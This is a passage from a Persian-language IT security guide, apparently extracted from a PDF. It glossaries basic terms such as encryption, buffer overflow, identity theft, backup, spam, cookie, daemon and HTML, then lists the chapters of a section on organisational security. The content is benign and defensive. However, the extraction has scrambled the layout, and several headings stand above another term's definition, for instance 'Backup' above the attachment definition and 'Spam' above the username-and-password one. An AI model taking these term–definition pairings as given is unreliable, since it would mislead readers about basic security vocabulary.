‫ﺩﺭ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻳـﻚ "ﻛﻠﻴـﺪ" ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺑـﺮ ﺍﺳـﺎﺱ‬
‫ﻳﻜﺴﺮﻱ ﻗﻮﺍﻧﻴﻦ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺍﺳﺖ ﻭ ﺑﺮﺍﻱ ﺗﻐﻴﻴﺮ ﻇﺎﻫﺮﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣـﻲﮔﻴـﺮﺩ‪ .‬ﺍﻳـﻦ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺯﻣﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺧﻮﺍﻧﺪﻩ ﺷﻮﺩ ﻛﻪ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺷﺪﻩ ﺑﺎﺷـﺪ ﻭ‬
‫ﺑﺮﺍﻱ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺁﻥ ﻻﺯﻡ ﺍﺳﺖ ﻓﺮﺩ ﺩﺭﻳﺎﻓﺖﻛﻨﻨـﺪﻩ‪ ،‬ﻫـﻢ‬
‫ﻛﻠﻴﺪ ﻭ ﻫﻢ ﺭﻭﺵ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﺮﺍ ﺑﺪﺍﻧﺪ‪.‬‬
‫ﺳﺮﺭﻳﺰﻱ ﺑﺎﻓﺮ‬
‫‪١٦٦‬‬
‫ﻳﻚ ﺍﺷﻜﺎﻝ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﺍﺳﺖ ﻭ ﻫﻨﮕﺎﻣﻲ ﺍﺗﻔﺎﻕ ﻣـﻲﺍﻓﺘـﺪ‬
‫ﻛﻪ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺩﺍﺩﻩﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑـﻪ ﻓـﻀﺎﻳﻲ ﺩﺭ ﺣﺎﻓﻈـﻪ‬
‫ﻣﻨﺘﻘﻞ ﻣﻲﻛﻨﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﺟﺎﻱ ﻛﺎﻓﻲ ﺑﺮﺍﻱ ﺩﺍﺩﻩﻫﺎ ﻭﺟـﻮﺩ‬
‫ﻧﺪﺍﺭﺩ‪ .‬ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﺑﺮﻧﺎﻣﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺍﺩﻩﻫﺎﻱ ﻗﺒﻠـﻲ ﺭﺍ‬
‫ﺍﺯ ﺣﺎﻓﻈﻪ ﺑﻴﺮﻭﻥ ﺑﻴﺎﻧﺪﺍﺯﺩ ﻭ ﺳﻌﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻓـﻀﺎﻳﻲ ﺭﺍ‬
‫ﺑﺮﺍﻱ ﺩﺍﺩﻩﻫﺎﻱ ﺟﺪﻳﺪ ﻣﻬﻴﺎ ﺳﺎﺯﺩ‪.‬‬
‫‪Backdoor‬‬
‫‪Firewall‬‬
‫‪Encryption‬‬
‫‪Buffer Overflow‬‬
‫‪163‬‬
‫‪164‬‬
‫‪165‬‬
‫‪166‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫ﺗﻌﺎﺭﻳﻒ ﺍﺻﻄﻼﺣﺎﺕ ﺩﺭ ﺣﻮﺯﺓ ﻣﺘﻮﻥ ﺍﻣﻨﻴﺘﻲ‬
‫‪١٦٣‬‬
‫‪١١٦‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺍﺯ ﺑﻴﻦ ﺭﻓﺘﻦ ﺍﻳﻦ ﺩﺍﺩﻩﻫﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎﻋﺚ ﺍﻳﺠﺎﺩ ﻣـﺸﻜﻼﺕ‬
‫ﻻ ﻳﻜﭙـﺎﺭﭼﮕﻲ ﻭ ﺍﻣﻨﻴـﺖ ﺑﺮﻧﺎﻣـﻪ ﺭﺍ‬
‫ﺯﻳﺎﺩﻱ ﮔﺮﺩﺩ ﻭ ﻣﻌﻤـﻮ ﹰ‬
‫ﺧﺪﺷﻪﺩﺍﺭ ﻣﻲﻛﻨﺪ‪ .‬ﺑﺎ ﺑﺮﺭﺳﻲ ﻓﻀﺎﻱ ﻛﺎﻓﻲ ﺣﺎﻓﻈﻪ ﻗﺒﻞ ﺍﺯ‬
‫ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﺑﻪ ﺁﻥ ﻣﻲ ﺗـﻮﺍﻥ ﺍﺯ ﻭﻗـﻮﻉ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ‬
‫ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩ‪.‬‬
‫ﺳﺮﻗﺖ ﻫﻮﻳﺖ‬
‫‪١٦٧‬‬
‫ﺳــﺮﻗﺖ ﻫﻮﻳــﺖ ﺯﻣــﺎﻧﻲ ﺍﺗﻔــﺎﻕ ﻣــﻲﺍﻓﺘــﺪ ﻛــﻪ ﺷــﺨﺺ‬
‫ﺍﻃﻼﻋﺎﺕ ﻛﺎﻓﻲ ﺩﺭ ﻣﻮﺭﺩ ﺷﻤﺎ ﺟﻤﻊﺁﻭﺭﻱ ﻛـﺮﺩﻩ ﺑﺎﺷـﺪ ﻭ‬
‫ﻼ ﺩﺭ‬
‫ﺑﺎ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺑﺘﻮﺍﻧﺪ ﺧﻮﺩ ﺭﺍ ﺑﺠﺎﻱ ﺷﻤﺎ ﺟﺎ ﺑﺰﻧﺪ )ﻣﺜ ﹰ‬
‫ﺑﺎﻧﻜﻬﺎ‪ ،‬ﻓﺮﻭﺷﮕﺎﻫﻬﺎ‪ ،‬ﻳﺎ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘﻲ(‪.‬‬
‫ﺿﻤﻴﻤﻪ‬
‫ﻫﺴﺘﻨﺪ‪ ،‬ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺘﻦ ﺑﺎﺯ ‪ -‬ﭼـﻪ ﺁﻧﻬـﺎﻳﻲ‬
‫ﻛﻪ ﺭﺍﻳﮕـﺎﻥ ﻫـﺴﺘﻨﺪ ﻭ ﭼـﻪ ﺁﻧﻬـﺎﻳﻲ ﻛـﻪ ﺑـﺮﺍﻱ ﻓـﺮﻭﺵ‬
‫ﻣﻲﺑﺎﺷﻨﺪ ‪ -‬ﻗﺎﺑﻠﻴﺘﻬﺎﻳﻲ ﺩﺍﺭﻧﺪ ﻛـﻪ ﻣـﺸﺎﺑﻪ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ‬
‫ﺍﻧﺤﺼﺎﺭﻱ ﺍﺳﺖ ﻭ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻫﺰﻳﻨـﺔ ﺑـﺎﻻﻳﻲ ﺩﺍﺷـﺘﻪ‬
‫ﺑﺎﺷــﺪ‪ .‬ﮔــﺎﻫﻲ ﺍﻭﻗــﺎﺕ ﺑﺮﻧﺎﻣــﻪﻫــﺎﻱ ﻣــﺘﻦﺑــﺎﺯ ﺗﺤــﺖ‬
‫ﻣﻮﺍﻓﻘﺘﻨﺎﻣﻪﻫﺎ ﻭ ﻣﺠﻮﺯﻫﺎﻱ ﺧﺎﺹ ﺑﺼﻮﺭﺕ ﻏﻴﺮ ﺭﺍﻳﮕﺎﻥ ﺩﺭ‬
‫ﻗﺴﻤﺘﻬﺎﻳﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺗﺠﺎﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﺑﺮﺍﻱ ﺍﻃﻼﻋـﺎﺕ ﺑﻴـﺸﺘﺮ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺑـﻪ‬
‫ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻧﻤﺎﻳﻴﺪ‪:‬‬
‫‪http://www.fsf.org‬‬
‫‪http://www.opensource.org‬‬
‫‪١٦٨‬‬
‫ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ‬
‫ﺿﻤﻴﻤﻪ ﻗﺴﻤﺘﻲ ﺍﺯ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﺖ ﻛﻪ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﺍﺯ ﺁﻥ ﻣﻲﺗﻮﺍﻥ ﺍﻧﻮﺍﻉ ﻓﺎﻳﻠﻬﺎ ﻣﺜﻞ ﻓﺎﻳﻠﻬﺎﻱ ﻣـﺘﻦ ﻭ ﺗـﺼﻮﻳﺮ‬
‫ﺭﺍ ﺍﻧﺘﻘﺎﻝ ﺩﺍﺩ‪ .‬ﺗﻤﺎﻣﻲ ﻓﺎﻳﻠﻬﺎﻱ ﻏﻴﺮ ﻣﺘﻨﻲ ﺑﺮﺍﻱ ﺍﺭﺳﺎﻝ ﺑﺎﻳﺪ‬
‫ﺑﺼﻮﺭﺕ ﻗﺎﺑﻞ ﭼﺎﭖ )ﻣﺘﻦﺳﺎﺩﻩ( ﺩﺭﺁﻳﻨﺪ‪ .‬ﺗﻤﺎﻣﻲ ﺁﻧﭽﻪ ﻛﻪ ﺩﺭ‬
‫ﺭﺍﻳﺎﻧﻪ ﺫﺧﻴﺮﻩ ﻣﻲﺷﻮﺩ ﺗﺮﻛﻴﺒﻲ ﺍﺯ ﺍﺭﻗـﺎﻡ ‪ ۰‬ﻭ ‪ ۱‬ﺍﺳـﺖ‪ .‬ﺑـﻪ‬
‫ﺯﺑﺎﻥ ﺳﺎﺩﻩﺗﺮ ﻛﺪﮔﺬﺍﺭﻱ ﺍﻳﻦ ﺻﻔﺮﻫﺎ ﻭ ﻳﻚﻫﺎ ﺭﺍ ﺑﺎ ﺗﺒﺪﻳﻞ‬
‫ﺑﻪ ﻣﺘﻮﻥ ﺳﺎﺩﻩ‪ ،‬ﻗﺎﺑﻞ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ‬
‫ﻓﺮﺁﻳﻨﺪ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﻣﺤﻠﻬـﺎﻱ‬
‫ﺩﻳﮕﺮ ﺩﺭ ﻫﻤﺎﻥ ﺭﺍﻳﺎﻧﻪ ﻭ ﻳـﺎ ﺭﻭﻱ ﺍﺑﺰﺍﺭﻫـﺎﻱ ﺟـﺎﻧﺒﻲ ﻛـﻪ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺴﺘﻘﻞ ﺍﺯ ﺁﻥ ﺭﺍﻳﺎﻧـﻪ ﺑﺎﺷـﻨﺪ‪ .‬ﻧـﺴﺨﻪ ﻫـﺎﻱ‬
‫ﭘﺸﺘﻴﺒﺎﻥ ﺑﺎﻋﺚ ﻣﻲﺷﻮﻧﺪ ﺑﺘﻮﺍﻧﻴﺪ ﺩﺍﺩﻩﻫـﺎﻳﻲ ﻛـﻪ ﺑـﻪ ﻫـﺮ‬
‫ﻼ ﺑﻄﻮﺭ ﺗﺼﺎﺩﻓﻲ ﭘﺎﻙ ﺷﺪﻩﺍﻧﺪ‪ ،‬ﺁﺳـﻴﺐ‬
‫ﺩﻟﻴﻠﻲ ﺍﺯ ﺑﻴﻦ ﺭﻓﺘﻪﺍﻧﺪ )ﻣﺜ ﹰ‬
‫ﻓﻴﺰﻳﻜﻲ ﺩﻳﺪﻩﺍﻧﺪ‪ ،‬ﻭ ﻳﺎ ﻣﻮﺭﺩ ﺳـﺮﻗﺖ ﻗـﺮﺍﺭ ﮔﺮﻓﺘـﻪﺍﻧـﺪ( ﺭﺍ ﺑﺎﺯﻳـﺎﺑﻲ‬
‫ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫‪١٦٩‬‬
‫ﻫﺮﺯﻧﺎﻣﻪ‬
‫ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﺤﺮﻣﺎﻧﻪ ﻛﻪ ﻛﺎﺭﺑﺮ ﺭﺍ ﺑﺮﺍﻱ ﻳـﻚ‬
‫ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﻳﺎ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺷﻨﺎﺳـﺎﻳﻲ ﻭ ﺗـﺼﺪﻳﻖ‬
‫ﻫﻮﻳﺖ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺘﻦﺑﺎﺯ‬
‫‪١٧١‬‬
‫‪١٧٢‬‬
‫ﺗﺒﻠﻴﻐﺎﺕ ﻭ ﺩﻳﮕﺮ ﻧﺎﻣﻪ ﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﻪ ﺑـﺪﻭﻥ ﺍﻳﻨﻜـﻪ‬
‫ﺷﻤﺎ ﺧﻮﺍﺳﺘﻪ ﺑﺎﺷﻴﺪ ﺑﺮﺍﻱ ﺷﻤﺎ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﻭﻳﺮﻭﺱ‬
‫‪١٧٠‬‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﺁﻧﻬﺎ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻋﻤﻮﻡ ﺍﺳـﺖ‬
‫ﻭ ﻫﻤﻪ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﺁﺯﺍﺩﺍﻧﻪ ﺁﻧﻬـﺎ ﺭﺍ ﺍﺻـﻼﺡ ﻛﻨﻨـﺪ ﻭ ﺗﻐﻴﻴـﺮ‬
‫ﺩﻫﻨﺪ‪ .‬ﺑﻪ ﺩﻟﻴﻞ ﺩﺭ ﺩﺳـﺘﺮﺱ ﺑـﻮﺩﻥ ﻣـﺘﻦ ﺑﺮﻧﺎﻣـﻪ‪ ،‬ﺍﻓـﺮﺍﺩ‬
‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﻧﺤﻮﺓ ﻋﻤﻠﻜﺮﺩ ﺁﻧﺮﺍ ﺑﺒﻴﻨﻨـﺪ ﻭ ﺑـﻪ ﺩﻟﺨـﻮﺍﻩ ﺧـﻮﺩ‬
‫ﻻ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ ﻣﺘﻦﺑﺎﺯ ﺳﺎﻳﺮ‬
‫ﺗﻐﻴﻴﺮ ﺩﻫﻨﺪ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﺑﺮﻧﺎﻣــﻪﻧﻮﻳــﺴﺎﻥ ﺭﺍ ﺗــﺸﻮﻳﻖ ﺑــﻪ ﻣــﺸﺎﺭﻛﺖ ﺩﺭ ﺗﻮﺳــﻌﻪ ﻭ‬
‫ﮔﺴﺘﺮﺵ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻣﻲﻧﻤﺎﻳﻨﺪ‪ .‬ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ‬
‫ﻣﺘﻦﺑـﺎﺯ ﻫﻤﭽﻨـﻴﻦ ﺷـﺎﻣﻞ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺭﺍﻳﮕـﺎﻥ ﻫـﻢ‬
‫‪Identity Theft‬‬
‫‪Attachment‬‬
‫‪Username & Password‬‬
‫‪Open-Source Software‬‬
‫‪167‬‬
‫‪168‬‬
‫‪169‬‬
‫‪170‬‬
‫‪١٧٣‬‬
‫ﺍﺻﻄﻼﺡ "ﻭﻳﺮﻭﺱ" ﻣﻌﻨﺎﻱ ﺧﺎﺻﻲ ﺩﺍﺭﺩ ﻛﻪ ﺩﺭ ﺑﺨـﺸﻬﺎﻱ‬
‫ﺁﺗﻲ ﺑﻴﺸﺘﺮ ﻣﻮﺭﺩ ﺑﺤﺚ ﻭ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲ ﮔﻴـﺮﺩ‪ .‬ﺩﺭﺣـﺎﻝ‬
‫ﺣﺎﺿﺮ ﻭﻳﺮﻭﺱ ﺑﻪ ﻣﺠﻤﻮﻋﺔ ﻫﻤـﺔ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻳﻲ ﺍﻃـﻼﻕ‬
‫ﻣﻲﮔﺮﺩﺩ ﻛﻪ ﺩﺭ ﺭﺍﻳﺎﻧﺔ ﺷـﻤﺎ ﻇـﺎﻫﺮ ﻣـﻲﺷـﻮﻧﺪ ﻭ ﻣﻤﻜـﻦ‬
‫ﺍﺳﺖ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﻧﻴـﺰ ﺳـﺮﺍﻳﺖ ﻛﻨﻨـﺪ ﻭ ﺑـﻪ ﺁﻧﻬـﺎ‬
‫ﺁﺳﻴﺒﻬﺎﻱ ﺟﺪﻱ ﻭﺍﺭﺩ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫‪171 Backup‬‬
‫‪172 Spam‬‬
‫‪173 Virus‬‬
‫‪١١٧‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫‪URL‬‬
‫‪Cookie‬‬
‫ﻳﻚ ﺁﺩﺭﺱ ﻋﻤـﻮﻣﻲ ﺑـﺮﺍﻱ ﺍﺷـﺎﺭﻩ ﺑـﻪ ﻳـﻚ ﻣﻘـﺼﺪ ﺩﺭ‬
‫ﺍﻳﻨﺘﺮﻧﺖ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜـﺎﻝ ‪http://www.infodev.org/‬‬
‫ﻳﺎ ‪mailto: [email protected]‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫ﻓﺎﻳﻠﻲ ﺍﺳﺖ ﻛﻪ ﻫﻨﮕﺎﻡ ﺩﺭﺧﻮﺍﺳﺖ ﻳﻚ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺍﺯ ﺭﺍﻩ‬
‫ﺩﻭﺭ‪ ،‬ﺭﻭﻱ ﺩﻳﺴﻚ ﺳﺨﺖ ﻧﻮﺷﺘﻪ ﻭ ﻳﺎ ﺍﺯ ﺭﻭﻱ ﺁﻥ ﺧﻮﺍﻧﺪﻩ‬
‫ﻣﻲﺷﻮﺩ‪ .‬ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺩﺭﺧﻮﺍﺳﺖ ﻣﻲﻛﻨـﺪ ﻛـﻪ ﻓﺎﻳـﻞ ﺭﻭﻱ‬
‫ﺭﺍﻳﺎﻧﺔ ﻣﻮﺭﺩ ﻧﻈﺮ ﻧﻮﺷﺘﻪ ﺷﻮﺩ ﺗـﺎ ﺑﻌـﺪﻫﺎ ﻫـﻢ ﺑﺘﻮﺍﻧـﺪ ﺁﻧـﺮﺍ‬
‫ﻼ ﺍﮔــﺮ ﭘﺎﻳﮕــﺎﻩ ﻭﺑــﻲ ﺍﺯ ﺷــﻤﺎ ﻧــﺎﻡ ﻛــﺎﺭﺑﺮﻱ‬
‫ﺑﺨﻮﺍﻧــﺪ‪ .‬ﻣــﺜ ﹰ‬
‫ﺩﺭﺧﻮﺍﺳﺖ ﻛﻨﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻳﻦ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺭﻭﻱ ﺩﻳـﺴﻚ‬
‫ﺷﻤﺎ ﺫﺧﻴﺮﻩ ﻧﻤﺎﻳﺪ‪ .‬ﻫﻨﮕﺎﻣﻴﻜﻪ ﺷﻤﺎ ﻣﺠﺪﺩﹰﺍ ﺑـﻪ ﺁﻥ ﭘﺎﻳﮕـﺎﻩ‬
‫ﻣﺮﺍﺟﻌﻪ ﻣﻲ ﻛﻨﻴﺪ‪ ،‬ﺍﻳﻦ ﭘﺎﻳﮕﺎﻩ ‪ cookie‬ﻗﺒﻠﻲ ﺭﺍ ﻣﻲﺧﻮﺍﻧﺪ‬
‫ﻭ ﻣﺘﻮﺟﻪ ﻣﻲﺷﻮﺩ ﻛﻪ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺷﻤﺎ ﭼﻪ ﺑﻮﺩﻩ ﺍﺳﺖ‪.‬‬
‫‪١٧٤‬‬
‫‪Daemon‬‬
‫ﺑﺮﻧﺎﻣﺔ ﻛﻮﭼﻜﻲ ﻛﻪ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﻫﻤﻴﺸﻪ ﺩﺭﺣﺎﻝ ﺍﺟﺮﺍ‬
‫ﺍﺳﺖ ﻭ ﻣﻨﺘﻈﺮ ﻣﻲﻣﺎﻧﺪ ﺗﺎ ﺍﺯ ﺁﻥ ﺑﺨﻮﺍﻫﻴﺪ ﻛﺎﺭﻱ ﺭﺍ ﺑـﺮﺍﻱ‬
‫ﻻ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ‬
‫ﺷﻤﺎ ﺍﻧﺠﺎﻡ ﺩﻫﺪ‪ .‬ﭼﻨﻴﻦ ﺩﺭﺧﻮﺍﺳﺘﻲ ﻣﻌﻤﻮ ﹰ‬
‫ﺷﺒﻜﻪ ﻭ ﺑﻮﺳﻴﻠﺔ ﻛﺎﺭﺑﺮ ﺭﺍﻩ ﺩﻭﺭ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ‪.‬‬
‫‪HTML‬‬
‫‪ HTML‬ﻳـــﻚ ﻛﻠﻤـــﺔ ﺍﺧﺘـــﺼﺎﺭﻱ ﺑـــﺮﺍﻱ ﻋﺒـــﺎﺭﺕ‬
‫‪ Hyper Text Markup Language‬ﺍﺳـﺖ‪ .‬ﺍﻳـﻦ‬
‫ﺯﺑﺎﻥ ﻣﺠﻤﻮﻋﻪ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﻣﺮﻭﺭﮔﺮ ﻭﺏ ﻳـﺎ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ‬
‫ﻣﺘﻮﻥ ﻭ ﺗﺼﺎﻭﻳﺮ ﺭﺍ ﻧﻤﺎﻳﺶ ﺩﻫﻨﺪ ﻭ ﻳﺎ ﻋﻤﻠﻴﺎﺕ ﺩﻳﮕﺮﻱ ﺑﻪ‬
‫ﺍﻧﺠﺎﻡ ﺭﺳﺎﻧﻨﺪ‪ .‬ﻧﻤﻮﻧـﻪ ﺍﻱ ﺍﺯ ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻱ ﺍﻳـﻦ ﺯﺑـﺎﻥ‬
‫ﭼﻨﻴﻦ ﺍﺳﺖ‪:‬‬
‫‪This sentence is <<Start Bold>> very‬‬
‫‪<<End Bold>> short.‬‬
‫ﺩﺭ ﺟﻤــﻼﺕ ﻓــﻮﻕ ﻛﻠﻤــﺎﺕ ﺩﺍﺧــﻞ ﻋﻼﻣــﺖ >><<‬
‫ﻧﺸﺎﻧﺪﻫﻨﺪﺓ ﻋﻤﻠﻲ ﺍﺳﺖ ﻛﻪ ﺑﺎﻳﺪ ﺍﻧﺠـﺎﻡ ﺷـﻮﺩ‪ .‬ﺩﺭ ﻧﺘﻴﺠـﺔ‬
‫ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻱ ﻓﻮﻕ ﺟﻤﻠﻪﺍﻱ ﺑﻪ ﺷﻜﻞ ﺯﻳﺮ ﺑـﻪ ﻧﻤـﺎﻳﺶ‬
‫ﺩﺭ ﻣﻲﺁﻳﺪ‪:‬‬
‫‪This sentence is very short.‬‬
‫‪174 Universal Resource Locator‬‬
‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﻓﺼﻞ ‪.۱‬‬
‫ﻣﻘﺪﻣﻪ‬
‫ﻓﺼﻞ ‪.۲‬‬
‫ﻣﺮﻭﺭﻱ ﺑﺮ ﺭﻭﺷﻬﺎﻱ ﻛﺎﻫﺶ ﺁﺛﺎﺭ ﳐﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﻓﺼﻞ ‪.۳‬‬
‫ﺑﺮﺁﻭﺭﺩ ﳐﺎﻃﺮﻩ ﻭ ﲢﻠﻴﻞ ﺯﻳﺎﻥ‬
‫ﻓﺼﻞ ‪.۴‬‬
‫ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺑﺮﺍﻱ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﱵ‬
‫ﻓﺼﻞ ‪.۵‬‬
‫ﭘﻴﺸﮕﲑﻱ ﻭ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺖ ﺳﺎﺯﻣﺎﱐ‬
‫ﻓﺼﻞ ‪.۶‬‬
‫ﺍﻣﻨﻴﺖ ﻛﺎﺭﻛﻨﺎﻥ‬
‫ﻓﺼﻞ ‪.۷‬‬
‫ﺑﺮﻭﻧﺴﭙﺎﺭﻱ ﺍﻣﻨﻴﺖ‬
‫ﻓﺼﻞ ‪.۸‬‬
‫ﺳﻴﺎﺳﺖﻫﺎﻱ ﺣﺮﱘ ﺧﺼﻮﺻﻲ‪ ،‬ﻗﺎﻧﻮﻥﻧﻮﻳﺴﻲ‪ ،‬ﻭ ﺗﺪﻭﻳﻦ ﺁﺋﲔﻧﺎﻣﻪﻫﺎﻱ ﺩﻭﻟﱵ‬
‫ﻓﺼﻞ ‪.۹‬‬
‫ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ‬
‫ﻓﺼﻞ ‪ .۱۰‬ﻣﺪﻳﺮﻳﺖ ﳐﺎﻃﺮﺍﺕ ﺳﻴﺎﺭ‪ :‬ﺧﺪﻣﺎﺕ ﻣﺎﱄ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﳏﻴﻂ ﰊﺳﻴﻢ‬
‫ﻓﺼﻞ ‪ .۱۱‬ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ‪ :‬ﺍﳚﺎﺩ ﻓﺮﻫﻨﮓ ﺍﻣﻨﻴﺖ‬
‫ﻓﺼﻞ ‪ .۱۲‬ﻗﻮﺍﻋﺪ ﺍﳝﲏ ﲡﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺮﺍﻱ ﳘﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺷﺮﻛﺘﻬﺎ‬
‫ﻓﺼﻞ ‪ .۱۳‬ﮔﻔﺘﮕﻮﻫﺎﻱ ﺑﲔﺍﳌﻠﻠﻲ ﭘﲑﺍﻣﻮﻥ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺖ‬
‫ﺑﻌﻀﻲ ﺷﺎﺧﺼﻬﺎﻱ ﺁﻣﺎﺭﻱ‬
‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﻓﺼﻞ ﺍﻭﻝ‬
‫ﻣﻘﺪﻣﻪ‬
‫ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺩﺭ ﺑﺨﺶ ﺩﻭﻡ ﻣﺸﺎﻫﺪﻩ ﻛﺮﺩﻳﻢ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺧﻮﺩ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﺫﺧﻴﺮﻩﺷـﺪﻩ ﺩﺭ ﺁﻥ‬
